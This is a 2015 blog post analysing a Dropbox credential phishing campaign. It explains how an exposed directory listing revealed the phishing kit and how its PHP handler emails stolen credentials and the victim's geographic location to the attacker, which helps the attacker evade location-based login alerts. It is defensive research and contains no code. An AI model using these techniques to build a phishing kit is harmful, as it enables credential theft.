Monday, 31 August 2015

Dropbox Credential Phishing Campaign

Dropbox Credential Phishing Campaign has been active since quite sometime. In this article I will share some interesting details related to this campaign.

Attackers will send an email with a URL that requests you to enter your username and password to view a Shared Document.

Figure 1: Login using your Email address and Password to view the Shared Document:

As shown in Figure 1, there is a static HTML login page which is used to phish the credentials. There are a few variants of this login page which I will discuss later.

Now, here is the interesting thing. The attacker did not modify the Apache Web Server settings to prevent Directory Listing. We often see this in the case of credential phishing and these attackers often do not disable directory listing.

We can browse the directories and find the zip archive as shown below:

Figure 2: Dropbox Phishing Archive found on the Server:

We can download the Phishing Archive and view the contents as shown in Figure 3.

Figure 3: Dropbox Phishing Archive contents:

If we view the HTML form login page on this Phishing Site, we can see that the Form's action field points to finish.php as shown in Figure 4.

Figure 4: HTML Form Login page:

Using Mozilla Firefox's Web Console we can quickly check the HTML form login page and see the HTML form's action field as shown in Figure 4. Now, let us find this file, finish.php in the Dropbox archive we found and view its source code. We can see that the credentials are obtained from the HTML form and an email is sent to:

Figure 5: Server Side code of Phishing:

We also notice one extra thing done in the PHP code above in addition to sending the phished credentials. It also collects the Geographic Information of the victim using the Geo IP lookup service: This information is sent to the attacker in email along with the phished credentials. The reason being, popular mail services like Gmail and Yahoo have a security feature which allows them to detect a login from another geographic location. So, with the information about geographic location of victim, the attacker can use the Proxy or VPN of the corresponding country to login to view their emails.

Now, let us take this one step further and collect different links from Internet which are related to same Phishing Campaign. I found a total of 751 phishing URLs which are posted here:

We can apply the method I have discussed in this article to get the list of attacker's email addresses. I will soon post a list of all the email addresses.